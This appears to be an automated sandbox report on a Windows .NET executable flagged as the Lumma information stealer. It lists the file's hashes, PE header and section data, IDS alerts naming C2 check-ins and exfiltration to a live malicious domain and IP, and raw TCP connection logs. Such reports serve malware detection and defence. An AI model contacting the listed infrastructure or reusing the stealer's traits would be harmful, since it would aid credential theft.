                                                                                            File size:760'832 bytes
                                                                                            MD5:7177b0ba961ddd258ee9672d436d6b63
                                                                                            SHA1:cdb7aef7f7a05430d323c00d43fe98af4680fa28
                                                                                            SHA256:1abcde09d85b8ff8788f23afaf33674557563273df5961719bc65216aa3a1a95
                                                                                            SHA512:df1b07f5d4ff53afc4547fb371af1393bafce2eec0cc96ab0ceeaeb4500a3e771f4d1b9c7936b86f38241abfdfb53c9cf2fff22d3a0e7006015f50c165c59078
                                                                                            SSDEEP:12288:RoA2sfoKrzzpKnToLX5y8anwFgBGOXtoTmDr1aVupsZTDfCc71FT/mI69puLam6q:n2sg0z2ToE8+Q8tpDr10fCETZ6
                                                                                            TLSH:5CF44A9C726072DFC867C472DEA82C68FA5174BB931F4247A02716ADAE4D897CF150F2
                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....ug..............0...................... ....@.. ....................... ............@................................
                                                                                            Icon Hash:90cececece8e8eb0
                                                                                            Entrypoint:0x4c000a
                                                                                            Entrypoint Section:
                                                                                            Digitally signed:false
                                                                                            Imagebase:0x400000
                                                                                            Subsystem:windows cui
                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                            Time Stamp:0x67758BE0 [Wed Jan 1 18:39:28 2025 UTC]
                                                                                            TLS Callbacks:
                                                                                            CLR (.Net) Version:
                                                                                            OS Version Major:4
                                                                                            OS Version Minor:0
                                                                                            File Version Major:4
                                                                                            File Version Minor:0
                                                                                            Subsystem Version Major:4
                                                                                            Subsystem Version Minor:0
                                                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                            Instruction
                                                                                            jmp dword ptr [004C0000h]
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            add byte ptr [eax], al
                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x907500x4b.text
                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xbc0000x630.rsrc
                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0xbe0000xc.reloc
                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0xc00000x8
                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x900000x48.text
                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                            <qqo!9W0x20000x8dfbc0x8e0007fff0c7c0fecf003b0f35d7cfea5292bFalse1.0003197898327465data7.999708454943257IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                            .text0x900000x2aab80x2ac0096fdb7fa19e968f31ed3add38830b8bdFalse0.31700018274853803data4.601162956172314IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                            .rsrc0xbc0000x6300x800f56b61609acce3d2ff125ebe9500bda6False0.35693359375data3.5365525633689616IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                            .reloc0xbe0000xc0x2005ba34c2ca37b35a0de4f3409909cbf7aFalse0.041015625data0.07225252269057866IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                            0xc00000x100x20017f9b25275a4d7c97677dd9cc8f5a01dFalse0.044921875data0.12227588125913882IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                            RT_VERSION0xbc0a00x3a4data0.45278969957081544
                                                                                            RT_MANIFEST0xbc4440x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                                                            DLLImport
                                                                                            mscoree.dll_CorExeMain
                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                            2025-01-04T09:41:59.845681+01002058550ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (undesirabkel .click)1192.168.2.4494811.1.1.153UDP
                                                                                            2025-01-04T09:42:00.348017+01002058551ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI)1192.168.2.449736188.114.96.3443TCP
                                                                                            2025-01-04T09:42:00.348017+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449736188.114.96.3443TCP
                                                                                            2025-01-04T09:42:00.957953+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449736188.114.96.3443TCP
                                                                                            2025-01-04T09:42:00.957953+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449736188.114.96.3443TCP
                                                                                            2025-01-04T09:42:01.447291+01002058551ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI)1192.168.2.449738188.114.96.3443TCP
                                                                                            2025-01-04T09:42:01.447291+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449738188.114.96.3443TCP
                                                                                            2025-01-04T09:42:02.320886+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449738188.114.96.3443TCP
                                                                                            2025-01-04T09:42:02.320886+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449738188.114.96.3443TCP
                                                                                            2025-01-04T09:42:03.107818+01002058551ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI)1192.168.2.449740188.114.96.3443TCP
                                                                                            2025-01-04T09:42:03.107818+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449740188.114.96.3443TCP
                                                                                            2025-01-04T09:42:06.751225+01002058551ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI)1192.168.2.449741188.114.96.3443TCP
                                                                                            2025-01-04T09:42:06.751225+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449741188.114.96.3443TCP
                                                                                            2025-01-04T09:42:07.275955+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449741188.114.96.3443TCP
                                                                                            2025-01-04T09:42:07.911389+01002058551ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI)1192.168.2.449742188.114.96.3443TCP
                                                                                            2025-01-04T09:42:07.911389+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449742188.114.96.3443TCP
                                                                                            2025-01-04T09:42:09.758036+01002058551ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI)1192.168.2.449743188.114.96.3443TCP
                                                                                            2025-01-04T09:42:09.758036+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449743188.114.96.3443TCP
                                                                                            2025-01-04T09:42:11.141919+01002058551ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI)1192.168.2.449744188.114.96.3443TCP
                                                                                            2025-01-04T09:42:11.141919+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449744188.114.96.3443TCP
                                                                                            2025-01-04T09:42:13.787834+01002058551ET MALWARE Observed Win32/Lumma Stealer Related Domain (undesirabkel .click in TLS SNI)1192.168.2.449745188.114.96.3443TCP
                                                                                            2025-01-04T09:42:13.787834+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449745188.114.96.3443TCP
                                                                                            2025-01-04T09:42:14.265404+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449745188.114.96.3443TCP
                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Jan 4, 2025 09:41:59.868381977 CET49736443192.168.2.4188.114.96.3
                                                                                            Jan 4, 2025 09:41:59.868417978 CET44349736188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:41:59.868488073 CET49736443192.168.2.4188.114.96.3
                                                                                            Jan 4, 2025 09:41:59.871087074 CET49736443192.168.2.4188.114.96.3
                                                                                            Jan 4, 2025 09:41:59.871098995 CET44349736188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:00.347861052 CET44349736188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:00.348016977 CET49736443192.168.2.4188.114.96.3
                                                                                            Jan 4, 2025 09:42:00.377063990 CET49736443192.168.2.4188.114.96.3
                                                                                            Jan 4, 2025 09:42:00.377080917 CET44349736188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:00.377319098 CET44349736188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:00.428051949 CET49736443192.168.2.4188.114.96.3
                                                                                            Jan 4, 2025 09:42:00.532795906 CET49736443192.168.2.4188.114.96.3
                                                                                            Jan 4, 2025 09:42:00.532855034 CET49736443192.168.2.4188.114.96.3
                                                                                            Jan 4, 2025 09:42:00.532888889 CET44349736188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:00.957957029 CET44349736188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:00.958089113 CET44349736188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:00.958164930 CET49736443192.168.2.4188.114.96.3
                                                                                            Jan 4, 2025 09:42:00.960692883 CET49736443192.168.2.4188.114.96.3
                                                                                            Jan 4, 2025 09:42:00.960705042 CET44349736188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:00.970547915 CET49738443192.168.2.4188.114.96.3
                                                                                            Jan 4, 2025 09:42:00.970561981 CET44349738188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:00.970624924 CET49738443192.168.2.4188.114.96.3
                                                                                            Jan 4, 2025 09:42:00.971007109 CET49738443192.168.2.4188.114.96.3
                                                                                            Jan 4, 2025 09:42:00.971014977 CET44349738188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:01.447215080 CET44349738188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:01.447290897 CET49738443192.168.2.4188.114.96.3
                                                                                            Jan 4, 2025 09:42:01.460601091 CET49738443192.168.2.4188.114.96.3
                                                                                            Jan 4, 2025 09:42:01.460623026 CET44349738188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:01.461025953 CET44349738188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:01.471568108 CET49738443192.168.2.4188.114.96.3
                                                                                            Jan 4, 2025 09:42:01.471590042 CET49738443192.168.2.4188.114.96.3
                                                                                            Jan 4, 2025 09:42:01.471682072 CET44349738188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:02.320939064 CET44349738188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:02.321028948 CET44349738188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:02.321072102 CET44349738188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:02.321074009 CET49738443192.168.2.4188.114.96.3
                                                                                            Jan 4, 2025 09:42:02.321099997 CET44349738188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:02.321141005 CET49738443192.168.2.4188.114.96.3
                                                                                            Jan 4, 2025 09:42:02.321155071 CET44349738188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:02.321257114 CET44349738188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:02.321297884 CET49738443192.168.2.4188.114.96.3
                                                                                            Jan 4, 2025 09:42:02.321299076 CET44349738188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:02.321314096 CET44349738188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:02.321346045 CET49738443192.168.2.4188.114.96.3
                                                                                            Jan 4, 2025 09:42:02.321362019 CET44349738188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:02.321546078 CET44349738188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:02.321588039 CET49738443192.168.2.4188.114.96.3
                                                                                            Jan 4, 2025 09:42:02.321594000 CET44349738188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:02.325539112 CET44349738188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:02.325587034 CET49738443192.168.2.4188.114.96.3
                                                                                            Jan 4, 2025 09:42:02.325592041 CET44349738188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:02.365581036 CET49738443192.168.2.4188.114.96.3
                                                                                            Jan 4, 2025 09:42:02.411401033 CET44349738188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:02.411483049 CET44349738188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:02.411526918 CET44349738188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:02.411622047 CET49738443192.168.2.4188.114.96.3
                                                                                            Jan 4, 2025 09:42:02.411628962 CET44349738188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:02.411643028 CET44349738188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:02.411664963 CET49738443192.168.2.4188.114.96.3
                                                                                            Jan 4, 2025 09:42:02.411696911 CET49738443192.168.2.4188.114.96.3
                                                                                            Jan 4, 2025 09:42:02.412379980 CET49738443192.168.2.4188.114.96.3
                                                                                            Jan 4, 2025 09:42:02.412396908 CET44349738188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:02.412406921 CET49738443192.168.2.4188.114.96.3
                                                                                            Jan 4, 2025 09:42:02.412411928 CET44349738188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:02.622525930 CET49740443192.168.2.4188.114.96.3
                                                                                            Jan 4, 2025 09:42:02.622567892 CET44349740188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:02.622633934 CET49740443192.168.2.4188.114.96.3
                                                                                            Jan 4, 2025 09:42:02.622889996 CET49740443192.168.2.4188.114.96.3
                                                                                            Jan 4, 2025 09:42:02.622914076 CET44349740188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:03.107732058 CET44349740188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:03.107817888 CET49740443192.168.2.4188.114.96.3
                                                                                            Jan 4, 2025 09:42:03.112905025 CET49740443192.168.2.4188.114.96.3
                                                                                            Jan 4, 2025 09:42:03.112914085 CET44349740188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:03.113240957 CET44349740188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:03.114420891 CET49740443192.168.2.4188.114.96.3
                                                                                            Jan 4, 2025 09:42:03.114572048 CET49740443192.168.2.4188.114.96.3
                                                                                            Jan 4, 2025 09:42:03.114619017 CET44349740188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:03.114677906 CET49740443192.168.2.4188.114.96.3
                                                                                            Jan 4, 2025 09:42:03.114685059 CET44349740188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:06.209470034 CET44349740188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:06.209559917 CET44349740188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:06.209631920 CET49740443192.168.2.4188.114.96.3
                                                                                            Jan 4, 2025 09:42:06.209758043 CET49740443192.168.2.4188.114.96.3
                                                                                            Jan 4, 2025 09:42:06.209774971 CET44349740188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:06.286535978 CET49741443192.168.2.4188.114.96.3
                                                                                            Jan 4, 2025 09:42:06.286567926 CET44349741188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:06.286669970 CET49741443192.168.2.4188.114.96.3
                                                                                            Jan 4, 2025 09:42:06.286971092 CET49741443192.168.2.4188.114.96.3
                                                                                            Jan 4, 2025 09:42:06.286982059 CET44349741188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:06.751007080 CET44349741188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:06.751224995 CET49741443192.168.2.4188.114.96.3
                                                                                            Jan 4, 2025 09:42:06.752393007 CET49741443192.168.2.4188.114.96.3
                                                                                            Jan 4, 2025 09:42:06.752399921 CET44349741188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:06.752598047 CET44349741188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:06.753858089 CET49741443192.168.2.4188.114.96.3
                                                                                            Jan 4, 2025 09:42:06.753981113 CET49741443192.168.2.4188.114.96.3
                                                                                            Jan 4, 2025 09:42:06.754008055 CET44349741188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:07.275970936 CET44349741188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:07.276087999 CET44349741188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:07.276194096 CET49741443192.168.2.4188.114.96.3
                                                                                            Jan 4, 2025 09:42:07.276407003 CET49741443192.168.2.4188.114.96.3
                                                                                            Jan 4, 2025 09:42:07.276422024 CET44349741188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:07.455223083 CET49742443192.168.2.4188.114.96.3
                                                                                            Jan 4, 2025 09:42:07.455266953 CET44349742188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:07.455349922 CET49742443192.168.2.4188.114.96.3
                                                                                            Jan 4, 2025 09:42:07.455655098 CET49742443192.168.2.4188.114.96.3
                                                                                            Jan 4, 2025 09:42:07.455670118 CET44349742188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:07.911304951 CET44349742188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:07.911389112 CET49742443192.168.2.4188.114.96.3
                                                                                            Jan 4, 2025 09:42:07.913014889 CET49742443192.168.2.4188.114.96.3
                                                                                            Jan 4, 2025 09:42:07.913021088 CET44349742188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:07.913237095 CET44349742188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:07.914371967 CET49742443192.168.2.4188.114.96.3
                                                                                            Jan 4, 2025 09:42:07.914546967 CET49742443192.168.2.4188.114.96.3
                                                                                            Jan 4, 2025 09:42:07.914582014 CET44349742188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:07.914640903 CET49742443192.168.2.4188.114.96.3
                                                                                            Jan 4, 2025 09:42:07.914649963 CET44349742188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:08.962595940 CET44349742188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:08.962718010 CET44349742188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:08.962773085 CET49742443192.168.2.4188.114.96.3
                                                                                            Jan 4, 2025 09:42:08.962893963 CET49742443192.168.2.4188.114.96.3
                                                                                            Jan 4, 2025 09:42:08.962908030 CET44349742188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:09.282937050 CET49743443192.168.2.4188.114.96.3
                                                                                            Jan 4, 2025 09:42:09.282975912 CET44349743188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:09.283129930 CET49743443192.168.2.4188.114.96.3
                                                                                            Jan 4, 2025 09:42:09.283418894 CET49743443192.168.2.4188.114.96.3
                                                                                            Jan 4, 2025 09:42:09.283442974 CET44349743188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:09.757945061 CET44349743188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:09.758035898 CET49743443192.168.2.4188.114.96.3
                                                                                            Jan 4, 2025 09:42:09.759154081 CET49743443192.168.2.4188.114.96.3
                                                                                            Jan 4, 2025 09:42:09.759162903 CET44349743188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:09.759758949 CET44349743188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:09.760881901 CET49743443192.168.2.4188.114.96.3
                                                                                            Jan 4, 2025 09:42:09.760926962 CET49743443192.168.2.4188.114.96.3
                                                                                            Jan 4, 2025 09:42:09.760931969 CET44349743188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:10.187879086 CET44349743188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:10.188009024 CET44349743188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:10.188080072 CET49743443192.168.2.4188.114.96.3
                                                                                            Jan 4, 2025 09:42:10.188206911 CET49743443192.168.2.4188.114.96.3
                                                                                            Jan 4, 2025 09:42:10.188230991 CET44349743188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:10.666409016 CET49744443192.168.2.4188.114.96.3
                                                                                            Jan 4, 2025 09:42:10.666454077 CET44349744188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:10.666557074 CET49744443192.168.2.4188.114.96.3
                                                                                            Jan 4, 2025 09:42:10.666927099 CET49744443192.168.2.4188.114.96.3
                                                                                            Jan 4, 2025 09:42:10.666943073 CET44349744188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:11.141833067 CET44349744188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:11.141918898 CET49744443192.168.2.4188.114.96.3
                                                                                            Jan 4, 2025 09:42:11.143353939 CET49744443192.168.2.4188.114.96.3
                                                                                            Jan 4, 2025 09:42:11.143363953 CET44349744188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:11.143665075 CET44349744188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:11.147414923 CET49744443192.168.2.4188.114.96.3
                                                                                            Jan 4, 2025 09:42:11.148277044 CET49744443192.168.2.4188.114.96.3
                                                                                            Jan 4, 2025 09:42:11.148313046 CET44349744188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:11.148420095 CET49744443192.168.2.4188.114.96.3
                                                                                            Jan 4, 2025 09:42:11.148454905 CET44349744188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:11.148544073 CET49744443192.168.2.4188.114.96.3
                                                                                            Jan 4, 2025 09:42:11.148598909 CET44349744188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:11.148693085 CET49744443192.168.2.4188.114.96.3
                                                                                            Jan 4, 2025 09:42:11.148718119 CET44349744188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:11.148827076 CET49744443192.168.2.4188.114.96.3
                                                                                            Jan 4, 2025 09:42:11.148852110 CET44349744188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:11.148969889 CET49744443192.168.2.4188.114.96.3
                                                                                            Jan 4, 2025 09:42:11.148996115 CET49744443192.168.2.4188.114.96.3
                                                                                            Jan 4, 2025 09:42:11.158375978 CET44349744188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:11.158524036 CET49744443192.168.2.4188.114.96.3
                                                                                            Jan 4, 2025 09:42:11.158550978 CET44349744188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:11.158570051 CET49744443192.168.2.4188.114.96.3
                                                                                            Jan 4, 2025 09:42:11.158590078 CET44349744188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:11.158675909 CET49744443192.168.2.4188.114.96.3
                                                                                            Jan 4, 2025 09:42:11.158704042 CET44349744188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:11.158724070 CET49744443192.168.2.4188.114.96.3
                                                                                            Jan 4, 2025 09:42:11.158740997 CET44349744188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:11.158775091 CET49744443192.168.2.4188.114.96.3
                                                                                            Jan 4, 2025 09:42:11.158797026 CET49744443192.168.2.4188.114.96.3
                                                                                            Jan 4, 2025 09:42:11.158844948 CET49744443192.168.2.4188.114.96.3
                                                                                            Jan 4, 2025 09:42:11.165184021 CET44349744188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:11.165261030 CET49744443192.168.2.4188.114.96.3
                                                                                            Jan 4, 2025 09:42:11.165287018 CET44349744188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:13.269215107 CET44349744188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:13.269402027 CET44349744188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:13.269470930 CET49744443192.168.2.4188.114.96.3
                                                                                            Jan 4, 2025 09:42:13.269727945 CET49744443192.168.2.4188.114.96.3
                                                                                            Jan 4, 2025 09:42:13.269747972 CET44349744188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:13.311661005 CET49745443192.168.2.4188.114.96.3
                                                                                            Jan 4, 2025 09:42:13.311700106 CET44349745188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:13.311780930 CET49745443192.168.2.4188.114.96.3
                                                                                            Jan 4, 2025 09:42:13.312060118 CET49745443192.168.2.4188.114.96.3
                                                                                            Jan 4, 2025 09:42:13.312073946 CET44349745188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:13.787765980 CET44349745188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:13.787833929 CET49745443192.168.2.4188.114.96.3
                                                                                            Jan 4, 2025 09:42:13.792129040 CET49745443192.168.2.4188.114.96.3
                                                                                            Jan 4, 2025 09:42:13.792138100 CET44349745188.114.96.3192.168.2.4
                                                                                            Jan 4, 2025 09:42:13.792377949 CET44349745188.114.96.3192.168.2.4
